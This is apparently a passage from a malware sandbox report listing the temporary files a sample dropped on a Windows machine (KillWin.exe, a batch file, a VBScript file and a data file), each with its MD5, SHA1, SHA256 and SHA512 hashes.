| SHA512 | f67065feb33b555748e5e82dd8c2b3da4992d03eab7444481b8d060fd74a579859bbbbf6f8f37aeb6e267ab4594a2c4732e90b5e2cf2cec006191885359f8826 |
C:\Users\Admin\AppData\Local\Temp\Data.lp
| MD5 | c63727e7d32cd53e644d8ab3435778fa |
| SHA1 | 4f187b6d1a0839ffff7bcc69368b40ca007067b3 |
| SHA256 | 91d5604845d13992f916f56c2301cf866973520ef647a5d7073cdddc0bca3d00 |
| SHA512 | 278aa953b1578c2b7eebcd6d4dc3241a3e8862ce1ebafb2e37ec3715f2f92833f147c41227052f8ec6f06ae35d71f810913b3c28dd1675ee5e473559b3e85bc7 |
C:\Users\Admin\AppData\Local\Temp\KillWin.exe
| MD5 | 3713a4dfdfa399b20561aa8bcbea1b25 |
| SHA1 | 8109cb8e9e9c00fba74d456c1756799c72072989 |
| SHA256 | 8e4e731640114f96219d4aa6ce2416c2f1db7e75834cdca91c380de6b0eebbaa |
| SHA512 | a34244e4622648dc19f2efa001bf461cec7794bb7050fadacd5369272d83db87fef711afbb5a108b7665304430a419ee7fdf09c2e8155f496eba1a321142b090 |
C:\Users\Admin\AppData\Local\Temp\4066_30760.bat
| MD5 | 71f2ece5d6de26f528ff0e1c9382f1c9 |
| SHA1 | 12b4fe9e4f1d4e0ea494393282baeb58f5991c8e |
| SHA256 | 648b31ac461f2539e111298e9d5f8e154ed8852a4f8c57cceec17504da8cdb01 |
| SHA512 | 0236aa82c44f9cdc7230d2b46c910c794820202e697031c893ed8502883f310bc202beee7d4a502f5508c8f6c320f9479e48be30f24f344624a0224a1f549c56 |
C:\Users\Admin\AppData\Local\Temp\m.vbs
| MD5 | cbaa7c6cb3c383b11dd691b316f2a91b |
| SHA1 | 0f2d66cea7cc24e0dda9972e05a7b236a9bcbc9e |
| SHA256 | 5f1ffcde4ee668c3350fdd9730df67adc35c704342ac2224924069c9bae2be95 |
| SHA512 | fe74a8ccd7875e7bf9588d386fd886810dc0edd01216bf5a886add985fcbb813296a606ec83028a90d30b4df348125827300a98f2ec6081a5d981d09316a44f9 |